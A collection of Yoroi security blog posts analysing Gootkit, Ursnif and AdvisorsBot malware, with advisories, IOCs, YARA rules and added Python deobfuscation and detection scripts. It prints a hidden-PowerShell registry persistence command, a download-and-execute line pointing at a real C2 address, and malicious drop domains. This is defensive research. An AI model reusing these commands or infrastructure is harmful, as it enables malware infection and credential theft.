By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant includes several modules written on top of NodeJS technology and embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In past years, the Gootkit source code has been leaked online and part of it is also available on the GitHub platform. This way we were able to investigate the differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As a general consideration, we noticed a lot of similarities between the two code bases: they are perfectly compatible, but a few differences hold. For instance, private keys and certificates have been modified, showing that the malware author chose a stronger key.

Table 5:  Certificate comparison
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting Italian organizations and users revealed interesting connections between two threats we were used to monitoring and detecting across both the InfoSec community and the CERT-Yoroi constituency, revealing a hidden link between this particular AZORult instance and the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used by cyber-criminals in the initial stages of the attacks, showing how the usage of extremely flexible stagers written in high-level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Indicators of Compromise

Yara rules

rule Gootkit_11_02_2019{

    meta:
        description = "Yara Rule for Gootkit"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_02_11"
        tlp = "white"
        category = "informational"

    strings:
        $a = {4D 5A}
        $b1 = {2D EE 9D 00 04 29 76 EC 00 00 F9}
        $c1 = {E6 C5 1F 2A 04 5A C8}
        $d1 = "LoadCursorW"
        $b2 = {75 0E E8 84 8D FF FF 83 CF FF C7}
        $c2 = {B9 C7 25 E7 00 5A 00 00 BA}
        $d2 = "GetCurrentPosition"

    condition:
        $a and (($b1 and $c1 and $d1) or ($b2 and $c2 and $d2))
}

rule Azorult_11_02_2019{

    meta:
        description = "Yara Rule for Azorult"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_02_11"
        tlp = "white"
        category = "informational"

    strings:
        $a = "MZ"
        $b = {44 00 02 00 00 00 6A 04 58 6B C0 00 8B 0D}
        $c = {00 00 8B 45 0C 8B 55 F8 39 50 0C 74 10 68}
        $d = {41 00 FF D6 8B D8 89 5D D4 85 DB 74 74 FF 35}

    condition:
        all of them
}

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Important Vulnerability in Containerization Technologies

Proto: N030219.

With this notice Yoroi wishes to inform you about an important vulnerability recently discovered in several containerization technologies, typically used to build modern applications in Cloud and Enterprise environments, such as Docker, cri-o, containerd, LXC, Kubernetes, etc. The issue is tracked as CVE-2019-5736.

The problem originates from the faulty handling of certain system aspects related to symbolic links inside the “runC” component present in the affected application families, which can allow a remote attacker to breach the security perimeter and gain access to the underlying system. This condition can pose security risks where vulnerable applications are managed and orchestrated through these containerization technologies.

Figure. Example attack chain

Several software and system vendors have confirmed the issue by releasing appropriate security updates, including, but not limited to, RedHat, Debian, Kubernetes, Docker and Novell. In this regard, and given the publication of technical details aimed at reproducing the issue, Yoroi recommends assessing the vulnerability status of any containerization technologies in use within your infrastructure and, where necessary, planning the application of the available patches.

Finally, Yoroi recommends keeping users' awareness high by periodically warning them about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

WhitePaper: Analysis of Collection #1 in the Italian Cyber Landscape

Introduction

Recent years have been characterized by substantial increases both in the number of recorded cyber attacks and in the volume of malware produced by criminal organizations. This evolution leads to the consolidation of an underground economy based on trading the credentials of unaware users, on building ad hoc malware and on hiring cyber criminals. This trade takes place in two main “territories”: ClearNets, such as (but not limited to) social networks, forums, IRC chats and Instant Messaging, and DarkNets, such as (but not limited to) Virtual and Private Networks, TOR, Luminati, Hola, freenet, etc.

Over the years, a multitude of organizations have been the target of cyber attacks: a share of them succeeded.

Data from multinationals, government bodies, police forces, political parties, software houses, service providers, publishing houses, newspapers, non-profit associations and social networks have been stolen and used to feed the cyber-criminal economy, which has been growing steadily for years. Many of these accounts, credentials or accesses have at some point in their history been sold or handed over within black markets and Darknets, giving other attackers the chance to abuse them and putting the millions of users involved in the compromise of these entities at renewed risk.

The organizations involved in these attacks are not only international organizations, multinationals or government organizations: many Italian companies (small and medium-sized) have suffered the same fate. Consider the public announcements of “Anonymous Italia”, which throughout 2018 marked one compromise after another month by month, exposing thousands of accounts on portals belonging to Italian public administrations and institutions. Compromises of such scale that they led to the creation of a portal dedicated to tracking exclusively Italian data breaches.

In December 2017 one of the best-known data breaches was ...

To continue reading, download the Yoroi WhitePaper.

"DHL" Malicious Campaign

Proto: N020219.

Yoroi wishes to inform you about an ongoing attack campaign against numerous Italian organizations and network users. The attacks take the form of fraudulent e-mail messages imitating communications from the express courier "DHL".

The e-mails carry compressed archives containing dangerous executable scripts which, if opened by the targeted user, download and run a dangerous variant of the AZORult Trojan. This threat is able to steal credentials and accounts saved in the web browser and in the mail clients in use; remaining silent on the victim machine, it can also install further malware implants in later phases of the attack.

The indicators of compromise identified during the analysis are reported below:

Finally, Yoroi recommends keeping user awareness high, periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

Ursnif: Long Live the Steganography!

Introduction

Another wave of Ursnif attacks hits Italy.
Ursnif is one of the most active banking trojans. It is also known as GOZI: it is a fork of the original Gozi-ISFB banking Trojan, whose source code was leaked in 2014, and it has updated and evolved Gozi's features over the years. In this variant too, Ursnif uses a weaponized Office document with an embedded VBA macro that acts as a dropper, together with multi-stage, highly obfuscated PowerShell scripts that hide the real payload. In addition, this Ursnif variant also uses steganography to hide the malicious code and avoid AV detection.

Moreover, this variant uses the QueueUserAPC process injection technique to inject into explorer.exe in a stealthier way: no remote threads are created in the target process.

Technical Analysis

The initial infection vector appears as a weaponized Excel file, inviting the user to enable macro execution to properly view the contents of the fake document, typically a purchase order, an invoice and so on.

Figure 1. Ursnif macro-weaponized document.

Extracting the macro code shows that the malware first checks the victim's country using the Application.International MS Office property. If the result corresponds to Italy (code 39), the macro executes the next command using the Shell function.

Figure 2. Part of Visual Basic macro code.

The remaining functions of the macro are used to prepare the shell command to launch, concatenating several strings encoded in different ways (mainly decimal and binary). The resulting command contains a huge binary string, which is converted into a new PowerShell command using:

[Convert]::ToInt16() -as [char]

Figure 3. Powershell script deployed by macro code.

As shown in the above figure, the malware tries to download an image from at least one of two embedded URLs:

The apparently legitimate image actually contains a new PowerShell command. The weaponized image is crafted using the Invoke-PSImage script, which embeds the bytes of a script into the pixels of a PNG file.

Figure 4. Powershell script hidden into “Fancy Mario”’s image.

Et voilà, another obfuscated PowerShell stage. The payload is encoded in Base64, so it is easy to move on and reveal the next code.

Figure 5. Another stage of deobfuscation process.

Basically, it is hexadecimal-encoded, and can be decoded with the same [Convert]::ToInt16 function seen earlier.
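The layers described so far (the macro's decimal and binary chunks, the Base64 stage hidden in the image, the hexadecimal stage) are all undone the same way: split the string into fixed-size chunks and run each one through [Convert]::ToInt16(chunk, base) -as [char]. The following Python is an added example, not code from the original post or from the Ursnif sample: it recognizes each of these encodings and peels them one at a time until only plain script remains. The strings it decodes are constructed for illustration and are not taken from the real stages.

```python
# Added example (not the original post's code): peel the string-encoding
# layers used by Ursnif's macro and PowerShell stages. Each layer is the
# inverse of what the script does with
#     [Convert]::ToInt16(chunk, base) -as [char]
# plus a Base64 layer for the stage hidden in the PNG. Sample strings are
# constructed here for illustration, not taken from the real sample.
import base64
import re

DECIMAL_LIST = re.compile(r"\d{1,3}(\s*,\s*\d{1,3})+")   # e.g. 105,101,120
BINARY_RUN = re.compile(r"[01]+")                          # e.g. 0110100101100101
HEX_RUN = re.compile(r"[0-9A-Fa-f]+")                      # e.g. 696578
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def decode_chunks(encoded, base, width):
    """Fixed-width chunks -> characters, like ToInt16(chunk, base) -as [char]."""
    if len(encoded) % width:
        raise ValueError("length is not a multiple of the chunk width")
    return "".join(chr(int(encoded[i:i + width], base))
                   for i in range(0, len(encoded), width))


def encode_chunks(text, base, width):
    """Inverse of decode_chunks; used only to build sample input."""
    digits = {2: "b", 16: "x"}[base]
    return "".join(format(ord(ch), digits).zfill(width) for ch in text)


def to_base64(text):
    return base64.b64encode(text.encode("ascii")).decode("ascii")


def peel_one(stage):
    """Recognise and strip one encoding layer; return (name, decoded) or None."""
    compact = "".join(stage.split())          # the scripts sprinkle whitespace/newlines
    if DECIMAL_LIST.fullmatch(stage.strip()):
        return "decimal", "".join(chr(int(x)) for x in stage.split(","))
    if BINARY_RUN.fullmatch(compact) and len(compact) % 8 == 0:
        return "binary", decode_chunks(compact, 2, 8)
    if HEX_RUN.fullmatch(compact) and len(compact) % 2 == 0:
        return "hex", decode_chunks(compact, 16, 2)
    if BASE64_RUN.fullmatch(compact) and len(compact) % 4 == 0:
        try:
            raw = base64.b64decode(compact, validate=True)
        except ValueError:
            return None
        # -EncodedCommand payloads are UTF-16LE (every other byte is NUL);
        # the Invoke-PSImage stage in this chain is plain ASCII text.
        if len(raw) % 2 == 0 and raw[1::2].count(0) >= len(raw) // 4:
            return "base64/utf16le", raw.decode("utf-16-le", errors="replace")
        return "base64", raw.decode("utf-8", errors="replace")
    return None


def peel_stages(blob, max_layers=10):
    """Apply peel_one repeatedly; returns [(layer_name, decoded_text), ...]."""
    layers = []
    current = blob
    while len(current) and len(layers) < max_layers:
        result = peel_one(current)
        if result is None:
            break
        layers.append(result)
        current = result[1]
    return layers


if __name__ == "__main__":
    # Constructed chain in the order the post describes: final script ->
    # hex -> Base64 (the layer hidden in the image pixels).
    final_script = "Get-Culture | Format-List -Property *"
    blob = to_base64(encode_chunks(final_script, 16, 2))
    for name, text in peel_stages(blob):
        print(f"[{name}] {text[:60]}")
```

The order of the checks matters: a binary run is also a valid hexadecimal and Base64 string, so the most restrictive alphabet is tried first, and the loop stops as soon as a layer no longer matches any known encoding, which is what you want when the last layer is the readable downloader.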

The final code is:

Figure 6. Powershell script downloading the Ursnif loader.

It performs another check of the victim's country, ensuring it is Italy. The information comes from the command:

Get-Culture | Format-List -Property *

If the check passes, the script downloads an EXE payload from http://fillialopago[.]info/~DF2F63, stores it in %TEMP%\Twain001.exe and then executes it.

At the time of analysis, the file was not detected by most antivirus engines:

Figure 7. Ursnif loader detection rate

Despite its low detection rate, this executable is a classic Ursnif loader, responsible for contacting the server to download the malicious binary that will be injected into the explorer.exe process. It uses the IWebBrowser.Navigate function to download data from its malicious server felipllet[.]info, with a URI path that looks like the path to a video file (.avi).

Figure 8. IWebBrowser.Navigate function invocation.

The server responds to this request with encrypted data, as shown in the following figure:

Figure 9. Part of network traffic containing some encrypted data.

After a decryption routine, all useful data is stored in registry values under HKCU\Software\AppDataLow\Software\Microsoft\{GUID}.

Figure 10. Registry keys set by the malware.

The registry value named "defrdisc" (a name that recalls the legitimate Disk Defragmentation Utility) contains the command that will be executed as the next step and at Windows startup, as displayed below.

Figure 11. Command executed at machine’s startup.

The command's only goal is to execute the data contained in the "cmiftall" registry value through the PowerShell engine.

C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').cmiftall))"

The "cmiftall" data is simply a PowerShell script encoded in hexadecimal, so it is possible to reconstruct its behavior.
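The persistence command above is a good candidate for a detection rule: wmic.exe creating a process, a hidden PowerShell window, iex, and a read from a per-victim key under HKCU\Software\AppDataLow\Software\Microsoft\{GUID}. The following Python is an added example, not code from the original post: it checks process command lines (the shape of a Sysmon Event ID 1 CommandLine field is assumed) for that combination. The log lines are constructed; the first reproduces the command quoted above, the others, including the second GUID, are made up.

```python
# Added example (not from the original post): flag command lines that match
# the persistence step described above: wmic.exe "process call create"
# spawning a hidden PowerShell that iex()es a script stored under
# HKCU\Software\AppDataLow\Software\Microsoft\{GUID}. The log lines are
# constructed for illustration (shape of a Sysmon Event ID 1 CommandLine
# field); line 1 reproduces the command quoted in the post, the others are
# made up. Any GUID is accepted because the key name is per-victim.
import re

GUID = r"\{?[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}?"

INDICATORS = {
    "wmic_process_create": re.compile(
        r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.I),
    "hidden_powershell": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s-w(?:indowstyle)?\s+hidden\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "registry_read": re.compile(
        r"\b(?:get-itemproperty|gp|reg(?:\.exe)?\s+query)\b", re.I),
    "appdatalow_guid_key": re.compile(
        r"HKCU:?\\Software\\AppDataLow\\Software\\Microsoft\\" + GUID, re.I),
}


def match_indicators(cmdline):
    """Names of the indicators present in one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def is_ursnif_persistence(cmdline):
    """True when a script is read from the AppDataLow\\{GUID} key and fed to iex.

    wmic and the hidden window strengthen the hit, but alone they are far
    too common in legitimate administration to alert on.
    """
    hits = match_indicators(cmdline)
    return ("appdatalow_guid_key" in hits
            and bool(hits & {"invoke_expression", "registry_read"}))


def scan(log_lines):
    """(1-based line number, sorted indicator names) for each flagged line."""
    return [(n, sorted(match_indicators(line)))
            for n, line in enumerate(log_lines, 1) if is_ursnif_persistence(line)]


SAMPLE_LOG = [
    # 1: the command quoted in the post
    r'''C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').cmiftall))"''',
    # 2-4: constructed benign administration activity
    r"C:\Windows\System32\wbem\WMIC.exe /node:srv01 os get caption",
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    r'''powershell -w hidden -c "Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'"''',
    # 5: constructed variant with another GUID, the gp alias and the long cmdlet name
    r'''powershell.exe -windowstyle hidden -c "Invoke-Expression ((gp 'HKCU:\Software\AppDataLow\Software\Microsoft\0A1B2C3D-1111-2222-3333-444455556666').xyz)"''',
]

if __name__ == "__main__":
    for line_no, names in scan(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(names)}")
```

The AppDataLow\{GUID} key is the anchor of the rule because it is the part of the technique the attacker cannot easily vary; the value names ("defrdisc", "cmiftall") and the wmic wrapper are cheap to change between campaigns, so the rule does not depend on them. Line 4 is the kind of hit a weaker rule built only on "hidden PowerShell reading the registry" would raise.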

Figure 12. Powershell script used to inject the final binary through the APC Injection technique.

So, using the PowerShell script stored in the registry value (shown above), Ursnif allocates enough space for its malicious byte array, containing the final payload, queues it as an APC on a thread of the legitimate process with QueueUserAPC, and triggers its execution with an alertable SleepEx call.

The Ursnif’s complete workflow is shown in figure:

Figure 13. Ursnif’s workflow.

Finally, from the data contained in the last script's byte array, it is possible to extract a DLL, which corresponds to what Ursnif injects into the explorer.exe process.

This DLL seems to be malformed, as stated by some static analysis tools:

Figure 14. Info about the malformed DLL.

However, when it is loaded in memory through the APC injection technique, it works with no problems. Submitting the file to VirusTotal, the result is striking: 0/56 anti-malware engines detect it.

Figure 15. Final DLL’s detection rate.

Conclusions

As first stated by us in the previous Ursnif analysis in December 2018, and later by Cisco Talos Intelligence in January 2019, this new Ursnif sample also uses the same APC injection technique to implant its final binary into the explorer.exe process, together with obfuscation and steganography to hide its malicious behaviour. Ursnif is more active and widespread than ever; the contacted C2 is not reachable, but the malware implant is still alive because the crooks constantly change their C2s to divert tracking and analysis.

Yoroi ZLab - Cybaze researchers are continuing the analysis of this undetected DLL in order to extract information and evidence to share with the research community.

Indicators of Compromise

Hashes

Dropurls

C2s

IPs

Artifacts

Yara rules

import "pe"
rule Ursnif_201902 {
meta:
	description = "Yara rule for Ursnif loader - January version"
	author = "Yoroi - ZLab"
	last_updated = "2019-02-06"
	tlp = "white"
	category = "informational"
strings:
	$a1 = "PADDINGXX"
	$a2 = { 66 66 66 66 66 66 66 }
condition:
	all of ($a*) and pe.number_of_sections == 4 and (pe.version_info["OriginalFilename"] contains "Lumen.exe" or pe.version_info["OriginalFilename"] contains "PropositionReputation.exe")
}

This blog post was authored by Antonio Farina, Davide Testa and Antonio Pirozzi of Cybaze-Yoroi Z-LAB

Vulnerability in Microsoft vCard

Proto: N010219.

Yoroi wishes to inform you about a vulnerability in the Microsoft Windows VCF contact manager, the system tool used to manage address book entries and digital business cards (vCards).

The issue stems from a lack of validation of the contact fields within ".contact" or ".vcf" vCard files which, once opened for viewing, can allow the target machine to be compromised through arbitrary code execution. This vulnerability can be exploited in spear-phishing scenarios, in which attackers invite potential victims to view contacts inside specially crafted vCards.

At the moment the vendor has not released updates to mitigate the problem; the affected versions are Microsoft Windows 10, 8, 7 and Vista.

Although no abuse of this vulnerability by attackers has been detected to date, given the publication of technical details to reproduce the issue and of examples of its use in attack simulations, Yoroi suggests informing your users, raising their awareness of the possibility of receiving unexpected e-mails containing ".contact" or ".vcf" attachments and, if these are not used, evaluating blocking them.

Finally, Yoroi recommends keeping user awareness high, periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

The return of AdvisorsBot

Introduction

In the past days, a new peculiar sample has been analyzed by the researchers of Cybaze-Yoroi ZLab. As usual, the malware looks like a legitimate e-mail attachment, named "invoice.doc". Today, weaponized Microsoft Office documents with macros are one of the most common and most effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users into enabling them.

The following figure shows the workflow of the infection chain:

Figure 1 - Malware’s workflow

Technical analysis

Hash (SHA256): a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
Threat: Dropper
Brief: invoice(7).doc
ssdeep: 3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 -   Dropper information

Hash (SHA256): 62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threat: PowerShell script
Brief: okzjtag.png (dropper/payload)
ssdeep: 192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 - Fake PNG, powershell script information

Once opened, the document kindly asks the user to enable the macro scripts, which are heavily obfuscated to avoid static detection.

Figure 2 - Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the PowerShell console, saves it with a .png file extension and runs it through the "iex" primitive.

Figure 3 - Piece of VBS script that starts malware infection

This script contains several Base64-encoded chunks of data, as shown in the following figure.

Figure 4 - Piece of code in Base64 encoded inside fake PNG image

Deobfuscating the first chunk reveals the IP of the C2. This address is the same one used to download the whole script.

Figure 5 - Deobfuscated C2’s IP

The second piece of script, labeled "$jdH9C", is a compressed GzipStream object. After decoding it, we noticed that an executable file is stored within the memory stream:

Figure 6 - DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”).

The last Base64 chunk is directly executed through the "iex" primitive. It is interesting to notice that it calls some "non-library" functions, i.e. functions loaded from the previously referenced DLL file.
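Put together, the three chunks are a small triage problem: decode every Base64 literal in the downloaded script, inflate the ones that are gzip streams, and check whether the result is a PE image, an IP address or more PowerShell. The following Python is an added example, not code from the original post or from AdvisorsBot; build_sample_script() constructs a stand-in for the real script (the $jdH9C name and the C2 string follow the analysis above, while the MZ/PE stub, the URL and the other variable names are invented).

```python
# Added example (not the original post's code): triage the Base64 literals
# of a downloaded "fake PNG" PowerShell script such as the one described
# above. Each literal is decoded and classified: an IPv4 string (the C2),
# a gzip stream that inflates to a PE image (the embedded DLL), or more
# PowerShell. The script built by build_sample_script() is constructed for
# illustration: the $jdH9C name and the C2 string follow the post, the
# rest (the tiny MZ/PE stub, the download URL, other variable names) is
# made up.
import base64
import gzip
import re
import struct

B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{8,}={0,2})['\"]")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
PS_KEYWORDS = re.compile(r"\b(?:iex|invoke-expression|downloadstring|new-object)\b", re.I)


def decode_chunk(b64):
    """Decode one Base64 literal and describe what it contains."""
    raw = base64.b64decode(b64, validate=True)
    info = {"kind": "binary", "gzip": False, "size": len(raw)}
    if raw[:2] == b"\x1f\x8b":                       # gzip magic: a GzipStream payload
        raw = gzip.decompress(raw)
        info["gzip"], info["size"] = True, len(raw)
    if raw[:2] == b"MZ" and len(raw) >= 0x40:
        e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
        has_pe = raw[e_lfanew:e_lfanew + 4] == b"PE\0\0"
        info["kind"] = "pe" if has_pe else "mz-stub"
        return info
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return info                                  # opaque binary: leave kind as is
    info["text"] = text
    if IPV4.fullmatch(text):
        info["kind"] = "ipv4"
    elif PS_KEYWORDS.search(text):
        info["kind"] = "powershell"
    else:
        info["kind"] = "text"
    return info


def triage_script(script_text):
    """One record per decodable Base64 literal, in script order."""
    records = []
    for m in B64_LITERAL.finditer(script_text):
        try:
            info = decode_chunk(m.group(1))
        except (ValueError, EOFError, OSError):      # bad Base64 or truncated/invalid gzip
            continue
        info["offset"] = m.start(1)
        records.append(info)
    return records


def build_sample_script():
    """Constructed stand-in for the downloaded script (not the real one)."""
    # Minimal MZ header whose e_lfanew points at "PE\0\0"; enough for the check above.
    fake_pe = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 16
    c2 = base64.b64encode(b"162.244.32.180").decode()
    dll = base64.b64encode(gzip.compress(fake_pe)).decode()
    stage = base64.b64encode(
        b"iex (New-Object Net.WebClient).DownloadString('http://' + $c2 + '/next')").decode()
    return (
        f"$c2 = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('{c2}'))\n"
        f"$jdH9C = '{dll}'\n"
        f"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('{stage}')))\n"
    )


if __name__ == "__main__":
    for rec in triage_script(build_sample_script()):
        print(rec["offset"], rec["kind"], rec["size"], rec.get("text", "")[:50])
```

The gzip check comes before the PE check on purpose: the DLL is only recognizable after inflation, and a record marked "pe" with "gzip" set to True is exactly the shape of the $jdH9C chunk. On a real script the "pe" record is the one to carve out to disk and hash.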

Within this script, we noticed a routine named "nvtTvqn" that gathers information about the victim machine.

Figure 7 - System information stolen by the malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. Files on the machine's desktop;
  9. AntiVirus product on computer.

Another interesting function is "j2aYhH":

Figure 8 - Accounts and emails stealing

This function searches for all e-mail accounts registered on the victim machine. Inside its code another routine, named "CR1Z", is referenced; this one verifies whether the Outlook client is installed.

Figure 9 - Registry key searched by the malware

DLL Analysis

As described in the previous paragraph, the PowerShell script uses functions exported by the executable.

Hash (SHA256): 5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
Threat: Malware payload containing some malicious functions invoked by the PowerShell script
Brief: *.dll file (Payload)
ssdeep: 96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 - DLL information

The file is a dynamic-link library not yet known to the major security platforms.

Figure 10 - DLL results on Virus Total

The library embeds MSIL code running on top of the .NET Framework, so it is quite straightforward to recover its source code.

Figure 11 - Static analysis on DLL

The extracted code contains utility functions used for many purposes, for instance to generate a pseudo-random installation path.

Figure 12 - Source code of function in DLL

The "kaYchi" function, instead, accepts three parameters, id, status and post, and creates files with two different extensions: "*.asp" if the "post" variable is true and "*.jpg" otherwise.

Figure 13 - Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at the time of writing. After the steps described, the malware tries to download further components from it and execute them with the "iex" primitive.

The last DNS activity was in December 2018. This IP is already known to the research community and labeled as malicious. The IP is located in the US, as visible in the following figures.

Figure 14 - previous DNS of C2
Figure 15 - C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018; we also found an associated certificate with the SHA-1 fingerprint 98b637715fa6429a60eed9b58447e967bf7e1018.

Figure 16 - zosmogroel.com certificate

This fingerprint was associated with more than 80 IP addresses; further analysis reveals that some of those IPs have been used as drop URLs for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018. We also found evidence on a public sandbox that last August the 162.244.32.180 remote C2 delivered an Ursnif/Gozi variant, 162.244.32.180/yak0810.exe, with the following SHA256: 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48, as also confirmed by signatures on VT. This last piece of evidence may suggest that this infrastructure was used to deliver different malware families.

Conclusions

Weaponized Microsoft Office documents delivered via e-mail are the top infection vector in today's malware landscape; in second place we find the abuse of the Microsoft DDE protocol and of the Equation Editor vulnerability CVE-2017-11882. One reason is that, very often, macro malware does not rely on expensive-to-deploy 0-day exploits and can bypass endpoint security solutions (macros are often whitelisted in enterprise environments) thanks to extensive use of multi-layered obfuscation, mainly in PowerShell; broadly speaking, it has a very low barrier to entry.

Several APTs today use spear-phishing e-mails with weaponized Office documents as attachments. To name just a few: OilRig used BondUpdater in a campaign discovered by FireEye in 2017, which targeted a Middle Eastern government organization with a malicious VBA macro that downloaded a two-stage PowerShell payload.

A similar vector was used in a recent APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE). The attackers did not use any zero-day vulnerabilities in this campaign; instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. The Turla APT also used weaponized documents in its recent campaigns to deliver KopiLuwak with a heavily obfuscated JavaScript payload.

This sample shows a high level of obfuscation to defeat AV and does not use any exploit; in fact, the obfuscated DLL component was not flagged by VT (0/60) at the time of writing. Unfortunately we cannot carry on the analysis because the C2 is not reachable yet, but we noticed that the last DNS activity was in December 2018, with the registration of 2 distinct domains each active for 1 week (and several domains before), which suggests that this malware was developed for target-specific activities, keeping the time window to a minimum each time. Further analysis of these registered domains suggests that the whole infrastructure is quite large (88 IPs found) and may also have been used to deliver other malware.

Researchers of Cybaze-Yoroi ZLAB advise disabling macros by default and checking the origin of e-mails in depth.

Indicators of Compromise

Yara rules

rule ps_dropper_29_01_2019 {
	meta:
		description = "Yara Rule for ps_dropper"
		author = "Cybaze Zlab_Yoroi"
		last_updated = "2019_01_29"
		tlp = "white"
		category = "informational"
	strings:
		$a = "nubiunddd"
		$b = {40 03 92 DA 05 60 CE 13 38}
		$c = {81 42 2A 08 43 4A 1C 00}
		$d = {D0 CF}
	condition:
		all of them
}

rule extracted_dll_29_01_2019 {
	meta:
		description = "Yara Rule for extracted_dll"
		author = "Cybaze Zlab_Yoroi"
		last_updated = "2019_01_29"
		tlp = "white"
		category = "informational"
	strings:
		$a = {4D 5A}
		$b = {61 00 73 00 70 00 00 09 2E 00 6A 00 70 00 67}
		$c = "tools.dll"
		$d = {54 43 77 77 00 6A 79 35}
	condition:
		all of them
}

rule image_script_29_01_2019 {
	meta:
		description = "Yara Rule for image_script"
		author = "Cybaze Zlab_Yoroi"
		last_updated = "2019_01_29"
		tlp = "white"
		category = "informational"
	strings:
		$a = "MTYyLjI0NC4zMi4xODA="
		$b = "oiiTPUErt"
		$c = "iQ2xpZW50KSVc"
		$d = "$sIS8cqNJ13x"
	condition:
		$a or $d or ($b and $c)
}

This blog post was authored by Davide Testa, Luigi Martire, Antonio Farina and Antonio Pirozzi of Cybaze-Yoroi Z-LAB